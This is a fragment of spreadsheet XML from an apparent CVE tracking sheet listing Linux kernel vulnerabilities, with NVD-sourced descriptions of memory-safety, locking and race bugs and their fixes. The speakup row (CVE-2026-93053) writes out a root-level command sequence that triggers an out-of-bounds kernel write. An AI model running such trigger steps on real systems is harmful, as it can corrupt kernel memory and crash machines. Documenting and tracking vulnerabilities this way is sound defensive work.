      <c r="P869" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q869" s="5" t="inlineStr"/>
      <c r="R869" s="5" t="inlineStr"/>
      <c r="S869" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
misc: ad525x_dpot: use driver core groups for sysfs files
ad_dpot_probe() creates per-RDAC sysfs files manually and then
optionally creates the command sysfs group. This leaves probe responsible
for rolling back partial sysfs state and makes remove responsible for
matching every file that probe created.
Move the device attributes into driver core dev_groups for the I2C and
SPI drivers and use an is_visible() callback to expose only the
attributes supported by the probed device. With this shape, the driver
core creates the sysfs files only after probe succeeds and removes them
before the remove callback frees the driver data.</t>
        </is>
      </c>
      <c r="T869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93051</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93052</t>
        </is>
      </c>
      <c r="D870" s="5" t="inlineStr"/>
      <c r="E870" s="5" t="inlineStr"/>
      <c r="F870" s="5" t="inlineStr"/>
      <c r="G870" s="5" t="inlineStr"/>
      <c r="H870" s="5" t="inlineStr"/>
      <c r="I870" s="5" t="inlineStr"/>
      <c r="J870" s="5" t="inlineStr"/>
      <c r="K870" s="5" t="inlineStr"/>
      <c r="L870" s="5" t="inlineStr"/>
      <c r="M870" s="5" t="inlineStr"/>
      <c r="N870" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O870" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P870" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q870" s="5" t="inlineStr"/>
      <c r="R870" s="5" t="inlineStr"/>
      <c r="S870" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
misc: bcm-vk: Use acquire/release for msgq_inited
bcm_vk_sync_msgq() fills the message queue information and then sets
msgq_inited. Readers call bcm_vk_drv_access_ok() before accessing the
message queues and their cached queue information.
atomic_set()/atomic_read() do not order those accesses. A reader can see
msgq_inited set while still seeing stale queue information. Use release
when publishing the initialized queues and acquire when checking the gate.
Keep the clear in bcm_vk_blk_drv_access() as atomic_set(). It closes the
gate and does not publish queue state to readers.</t>
        </is>
      </c>
      <c r="T870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93052</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93053</t>
        </is>
      </c>
      <c r="D871" s="5" t="inlineStr"/>
      <c r="E871" s="5" t="inlineStr"/>
      <c r="F871" s="5" t="inlineStr"/>
      <c r="G871" s="5" t="inlineStr"/>
      <c r="H871" s="5" t="inlineStr"/>
      <c r="I871" s="5" t="inlineStr"/>
      <c r="J871" s="5" t="inlineStr"/>
      <c r="K871" s="5" t="inlineStr"/>
      <c r="L871" s="5" t="inlineStr"/>
      <c r="M871" s="5" t="inlineStr"/>
      <c r="N871" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O871" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P871" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q871" s="5" t="inlineStr"/>
      <c r="R871" s="5" t="inlineStr"/>
      <c r="S871" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
speakup: keyhelp: guard letter_offsets possible out-of-range indexing
help_init() builds letter_offsets[] by using the first byte of each
function name as an index via `(start &amp; 31) - 1`. If function_names are
overridden from sysfs (root) with a name starting outside [a–z], the
index underflows or exceeds the array, leading to OOB write.
Function names can be overridden with the following commands as root:
    modprobe speakup_soft
    echo "0 _bad" &gt; /sys/accessibility/speakup/i18n/function_names
    # then press Insert+2 on /dev/tty
This fix checks the first letter in help_init(), and if it is not in the
[a–z] range the function returns an error to the caller. Eventually this
error is propagated to drivers/accessibility/speakup/main.c:2217, which
causes a bleep sound.</t>
        </is>
      </c>
      <c r="T871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93053</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93054</t>
        </is>
      </c>
      <c r="D872" s="5" t="inlineStr"/>
      <c r="E872" s="5" t="inlineStr"/>
      <c r="F872" s="5" t="inlineStr"/>
      <c r="G872" s="5" t="inlineStr"/>
      <c r="H872" s="5" t="inlineStr"/>
      <c r="I872" s="5" t="inlineStr"/>
      <c r="J872" s="5" t="inlineStr"/>
      <c r="K872" s="5" t="inlineStr"/>
      <c r="L872" s="5" t="inlineStr"/>
      <c r="M872" s="5" t="inlineStr"/>
      <c r="N872" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O872" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P872" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q872" s="5" t="inlineStr"/>
      <c r="R872" s="5" t="inlineStr"/>
      <c r="S872" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
uio: Fix stale info pointer in failed registration path
After device_add(), the UIO device is visible to userspace and /dev/uioX
can be opened. If a later setup step fails, __uio_register_device()
unwinds the device but leaves idev-&gt;info pointing at the caller-owned
struct uio_info.
That is unsafe when an opener races with the failed registration path.
The open file keeps a reference to the uio_device, while the caller sees
registration failure and may free its struct uio_info. Later file
operations can then follow idev-&gt;info and dereference freed memory.
Handle post-device_add() failures like unregister: remove UIO attributes
while the info pointer is still valid, then clear idev-&gt;info under
info_lock and wake existing waiters/async users before removing the
device and minor. This makes already-open file descriptors observe the
same "device gone" state as normal uio_unregister_device().</t>
        </is>
      </c>
      <c r="T872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93054</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93055</t>
        </is>
      </c>
      <c r="D873" s="5" t="inlineStr"/>
      <c r="E873" s="5" t="inlineStr"/>
      <c r="F873" s="5" t="inlineStr"/>
      <c r="G873" s="5" t="inlineStr"/>
      <c r="H873" s="5" t="inlineStr"/>
      <c r="I873" s="5" t="inlineStr"/>
      <c r="J873" s="5" t="inlineStr"/>
      <c r="K873" s="5" t="inlineStr"/>
      <c r="L873" s="5" t="inlineStr"/>
      <c r="M873" s="5" t="inlineStr"/>
      <c r="N873" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O873" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P873" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q873" s="5" t="inlineStr"/>
      <c r="R873" s="5" t="inlineStr"/>
      <c r="S873" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
UDF symlink pathComponent header OOB read
udf_symlink_filler() can enter udf_pc_to_char() with a partial pathComponent header.
Validate that enough input remains for a complete pathComponent header
before accessing it. Reject malformed symlink data that would otherwise
make udf_pc_to_char() perform an out-of-bounds read.</t>
        </is>
      </c>
      <c r="T873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93055</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93056</t>
        </is>
      </c>
      <c r="D874" s="5" t="inlineStr"/>
      <c r="E874" s="5" t="inlineStr"/>
      <c r="F874" s="5" t="inlineStr"/>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="inlineStr"/>
      <c r="I874" s="5" t="inlineStr"/>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr"/>
      <c r="L874" s="5" t="inlineStr"/>
      <c r="M874" s="5" t="inlineStr"/>
      <c r="N874" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O874" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P874" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q874" s="5" t="inlineStr"/>
      <c r="R874" s="5" t="inlineStr"/>
      <c r="S874" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_uac1_legacy: remove broken string configfs attributes
The UAC1_STR_ATTRIBUTE macro defines configfs show/store handlers for
the fn_play, fn_cap, and fn_cntl string options. The store function
contains an inverted null check on the kstrndup() return value.
This means every write attempt returns -ENOMEM on success and
dereferences a NULL pointer on allocation failure. The attributes
have been broken and unused for many years.
Remove the UAC1_STR_ATTRIBUTE macro and the three attributes it
generated. The internal defaults (FILE_PCM_PLAYBACK, FILE_PCM_CAPTURE,
FILE_CONTROL) set in f_audio_alloc_inst() are unaffected.</t>
        </is>
      </c>
      <c r="T874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93056</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93057</t>
        </is>
      </c>
      <c r="D875" s="5" t="inlineStr"/>
      <c r="E875" s="5" t="inlineStr"/>
      <c r="F875" s="5" t="inlineStr"/>
      <c r="G875" s="5" t="inlineStr"/>
      <c r="H875" s="5" t="inlineStr"/>
      <c r="I875" s="5" t="inlineStr"/>
      <c r="J875" s="5" t="inlineStr"/>
      <c r="K875" s="5" t="inlineStr"/>
      <c r="L875" s="5" t="inlineStr"/>
      <c r="M875" s="5" t="inlineStr"/>
      <c r="N875" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O875" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P875" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q875" s="5" t="inlineStr"/>
      <c r="R875" s="5" t="inlineStr"/>
      <c r="S875" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: core: Avoid possible memory reclaim deadlock in TX EQTR context
TX EQTR may run while devfreq gear scaling has quiesced the UFS
tagset. In that context, functions ufshcd_tx_eqtr(), __ufshcd_tx_eqtr()
and ufs_qcom_get_rx_fom() allocate memory with GFP_KERNEL. If direct
reclaim is triggered, reclaim/writeback can depend on I/O to UFS
device. Because the queue is quiesced, this can cause deadlock.
Use memalloc_noio_save/restore() in ufshcd_tx_eqtr() to cover all
allocations in the TX EQTR call tree, including:
 - params-&gt;eqtr_record in ufshcd_tx_eqtr()
 - eqtr_data in __ufshcd_tx_eqtr()
 - params in ufs_qcom_get_rx_fom()
This is preferred over tagging individual call sites with GFP_NOIO, as it
automatically covers any future allocations added anywhere in the call tree
without requiring each caller to be aware of this constraint.
[mkp: fix label as suggested by Bart]</t>
        </is>
      </c>
      <c r="T875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93057</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93058</t>
        </is>
      </c>
      <c r="D876" s="5" t="inlineStr"/>
      <c r="E876" s="5" t="inlineStr"/>
      <c r="F876" s="5" t="inlineStr"/>
      <c r="G876" s="5" t="inlineStr"/>
      <c r="H876" s="5" t="inlineStr"/>
      <c r="I876" s="5" t="inlineStr"/>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr"/>
      <c r="L876" s="5" t="inlineStr"/>
      <c r="M876" s="5" t="inlineStr"/>
      <c r="N876" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O876" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P876" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q876" s="5" t="inlineStr"/>
      <c r="R876" s="5" t="inlineStr"/>
      <c r="S876" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Only fini scheduler after successful init
msm_ringbuffer_new() destroys a partially initialized ring through
msm_ringbuffer_destroy() when an allocation or scheduler setup step
fails.
If drm_sched_init() fails before it finishes initializing the scheduler,
the failure path still calls drm_sched_fini(). That teardown path assumes
the scheduler work items, lists, and workqueue state were initialized.
Track successful scheduler initialization and call drm_sched_fini() only
after drm_sched_init() returned 0.
This issue was found by a static analysis checker and confirmed by
manual source review.
Patchwork: https://patchwork.freedesktop.org/patch/738905/</t>
        </is>
      </c>
      <c r="T876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93058</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93059</t>
        </is>
      </c>
      <c r="D877" s="5" t="inlineStr"/>
      <c r="E877" s="5" t="inlineStr"/>
      <c r="F877" s="5" t="inlineStr"/>
      <c r="G877" s="5" t="inlineStr"/>
      <c r="H877" s="5" t="inlineStr"/>
      <c r="I877" s="5" t="inlineStr"/>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr"/>
      <c r="L877" s="5" t="inlineStr"/>
      <c r="M877" s="5" t="inlineStr"/>
      <c r="N877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O877" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P877" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q877" s="5" t="inlineStr"/>
      <c r="R877" s="5" t="inlineStr"/>
      <c r="S877" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Fix task_struct reference leak in recover_worker
get_pid_task() increments the task reference count, but the
corresponding put_task_struct() was missing in the else branch,
leaking a reference on every GPU hang recovery.
Patchwork: https://patchwork.freedesktop.org/patch/730662/</t>
        </is>
      </c>
      <c r="T877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93059</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93060</t>
        </is>
      </c>
      <c r="D878" s="5" t="inlineStr"/>
      <c r="E878" s="5" t="inlineStr"/>
      <c r="F878" s="5" t="inlineStr"/>
      <c r="G878" s="5" t="inlineStr"/>
      <c r="H878" s="5" t="inlineStr"/>
      <c r="I878" s="5" t="inlineStr"/>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr"/>
      <c r="L878" s="5" t="inlineStr"/>
      <c r="M878" s="5" t="inlineStr"/>
      <c r="N878" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O878" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P878" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q878" s="5" t="inlineStr"/>
      <c r="R878" s="5" t="inlineStr"/>
      <c r="S878" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm/adreno: fix use after free on error path in a6xx_gpu_init()
The a6xx_destroy() function frees "a6xx_gpu" and so "adreno_gpu" points
to freed memory.  Preserve the error code before freeing the memory to
avoid a use after free.
Patchwork: https://patchwork.freedesktop.org/patch/732275/</t>
        </is>
      </c>
      <c r="T878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93060</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93061</t>
        </is>
      </c>
      <c r="D879" s="5" t="inlineStr"/>
      <c r="E879" s="5" t="inlineStr"/>
      <c r="F879" s="5" t="inlineStr"/>
      <c r="G879" s="5" t="inlineStr"/>
      <c r="H879" s="5" t="inlineStr"/>
      <c r="I879" s="5" t="inlineStr"/>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr"/>
      <c r="L879" s="5" t="inlineStr"/>
      <c r="M879" s="5" t="inlineStr"/>
      <c r="N879" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O879" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P879" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q879" s="5" t="inlineStr"/>
      <c r="R879" s="5" t="inlineStr"/>
      <c r="S879" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
gpu: host1x: Avoid stack over-read in debug output helpers
host1x_debug_output() and host1x_debug_cont() used vsnprintf(), which
returns the length the formatted string would have reached with an
unbounded buffer. That return value was passed straight to o-&gt;fn as
the number of bytes to emit.
This could cause a read past end of the output buffer if a call to
host1x_debug_* produced a string longer than 256 bytes. This only
affected the debugfs files as the printk debug sink ignores the
number of bytes. In practice, this is very unlikely to occur.
Fix by switching to vscnprintf(), which returns the number of bytes
actually written.</t>
        </is>
      </c>
      <c r="T879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93061</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93062</t>
        </is>
      </c>
      <c r="D880" s="5" t="inlineStr"/>
      <c r="E880" s="5" t="inlineStr"/>
      <c r="F880" s="5" t="inlineStr"/>
      <c r="G880" s="5" t="inlineStr"/>
      <c r="H880" s="5" t="inlineStr"/>
      <c r="I880" s="5" t="inlineStr"/>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr"/>
      <c r="L880" s="5" t="inlineStr"/>
      <c r="M880" s="5" t="inlineStr"/>
      <c r="N880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O880" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P880" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q880" s="5" t="inlineStr"/>
      <c r="R880" s="5" t="inlineStr"/>
      <c r="S880" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: guard against division by zero in iwl_dbg_tlv_alloc_fragments
Make sure we don't end-up with a num_frags = 0 situation.
For that, check that the required size is not 0 and put a checker on
num_frags as well.</t>
        </is>
      </c>
      <c r="T880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93062</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93063</t>
        </is>
      </c>
      <c r="D881" s="5" t="inlineStr"/>
      <c r="E881" s="5" t="inlineStr"/>
      <c r="F881" s="5" t="inlineStr"/>
      <c r="G881" s="5" t="inlineStr"/>
      <c r="H881" s="5" t="inlineStr"/>
      <c r="I881" s="5" t="inlineStr"/>
      <c r="J881" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K881" s="5" t="inlineStr"/>
      <c r="L881" s="5" t="inlineStr"/>
      <c r="M881" s="5" t="inlineStr"/>
      <c r="N881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O881" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P881" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q881" s="5" t="inlineStr"/>
      <c r="R881" s="5" t="inlineStr"/>
      <c r="S881" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: mei: check SAP message length before reading it
Verify the SAP message size is not larger than the local buffer before
reading the message to avoid buffer overflow.</t>
        </is>
      </c>
      <c r="T881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93063</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93064</t>
        </is>
      </c>
      <c r="D882" s="5" t="inlineStr"/>
      <c r="E882" s="5" t="inlineStr"/>
      <c r="F882" s="5" t="inlineStr"/>
      <c r="G882" s="5" t="inlineStr"/>
      <c r="H882" s="5" t="inlineStr"/>
      <c r="I882" s="5" t="inlineStr"/>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr"/>
      <c r="L882" s="5" t="inlineStr"/>
      <c r="M882" s="5" t="inlineStr"/>
      <c r="N882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O882" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P882" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q882" s="5" t="inlineStr"/>
      <c r="R882" s="5" t="inlineStr"/>
      <c r="S882" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: mvm: fix off-by-one in TXF key sanitiser
iwl_mvm_frob_txf_key_iter() tracks the last matched byte position
in loop variable 'i'. When a full key match is found (match ==
keylen), 'i' points at the last byte of the matched key. The
memset start offset should therefore be i + 1 - keylen, not
i - keylen; the current code zeroes one byte before the match
and leaves the final key byte un-sanitised.</t>
        </is>
      </c>
      <c r="T882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93064</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93065</t>
        </is>
      </c>
      <c r="D883" s="5" t="inlineStr"/>
      <c r="E883" s="5" t="inlineStr"/>
      <c r="F883" s="5" t="inlineStr"/>
      <c r="G883" s="5" t="inlineStr"/>
      <c r="H883" s="5" t="inlineStr"/>
      <c r="I883" s="5" t="inlineStr"/>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr"/>
      <c r="L883" s="5" t="inlineStr"/>
      <c r="M883" s="5" t="inlineStr"/>
      <c r="N883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O883" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P883" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q883" s="5" t="inlineStr"/>
      <c r="R883" s="5" t="inlineStr"/>
      <c r="S883" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: fix counter type in iwl_fwrt_dump_error_logs
The loop counter 'count' was declared as u8 while num_pc is u32.
If firmware advertises more than 255 PC entries the counter wraps
back to zero and the loop never terminates potentially causing an
infinite loop or reading past the allocated pc_data array.
Change the declaration to u32 to match num_pc.</t>
        </is>
      </c>
      <c r="T883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93065</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93066</t>
        </is>
      </c>
      <c r="D884" s="5" t="inlineStr"/>
      <c r="E884" s="5" t="inlineStr"/>
      <c r="F884" s="5" t="inlineStr"/>
      <c r="G884" s="5" t="inlineStr"/>
      <c r="H884" s="5" t="inlineStr"/>
      <c r="I884" s="5" t="inlineStr"/>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr"/>
      <c r="L884" s="5" t="inlineStr"/>
      <c r="M884" s="5" t="inlineStr"/>
      <c r="N884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O884" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P884" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q884" s="5" t="inlineStr"/>
      <c r="R884" s="5" t="inlineStr"/>
      <c r="S884" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Take cpa_lock around large-page collapse
Loading and unloading modules concurrently on several CPUs on a KASAN
build, with a short delay injected at the CPA page-table lookup to
widen the window, faults within minutes:
  BUG: KASAN: use-after-free in __change_page_attr+0x7cc/0x7e0
  Write of size 8 at addr ffff888181139718 by task modprobe
  ...
  The buggy address belongs to the physical page:
   pfn:0x181139 ... page_type: f2(table)
cpa_collapse_large_pages() rebuilds a leaf PMD from its 4K PTEs and
frees the old PTE-table pages, while __change_page_attr() fetches a
PTE pointer from a lockless lookup_address_in_pgd_attr() and writes
it with set_pte_atomic() only later. When module text is served from
a shared large ROX mapping the two run on the same PMD:
  CPU A (module load)              CPU B (module finalize)
  -------------------              -----------------------
  execmem_make_temp_rw
   set_memory_nx
    __change_page_attr
     split 2M -&gt; 4K table P
     kpte = &amp;P[i]  (lockless)
                                   execmem_restore_rox
                                    set_memory_rox (CPA_COLLAPSE)
                                     cpa_collapse_large_pages
                                      rebuild leaf PMD
                                      flush_tlb_all
                                      pagetable_free(P)
     set_pte_atomic(kpte, ...)
       -&gt; writes into freed P
P is a page-table page (page_type: table), reused at once, so the
write corrupts whatever got the page next: a bad-pte or bad-page
splat, or a fatal fault once P has been turned into read-only text.
The flush_tlb_all() before the free does not close this: its IPI only
serializes against page-table walkers that run with interrupts off
(e.g. GUP-fast); the walk in __change_page_attr() runs with interrupts
on, so nothing stops it from holding a stale pointer into P.
Serialize the collapse - the PMD rebuild, TLB flush and PTE-table
free - under cpa_lock, the same lock __change_page_attr() now takes
unconditionally since commit ("x86/mm/pat: stop gating cpa_lock on
debug_pagealloc_enabled()"), so a concurrent walker can no longer
hold a pointer into a table the collapse is about to free.</t>
        </is>
      </c>
      <c r="T884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93066</t>
        </is>
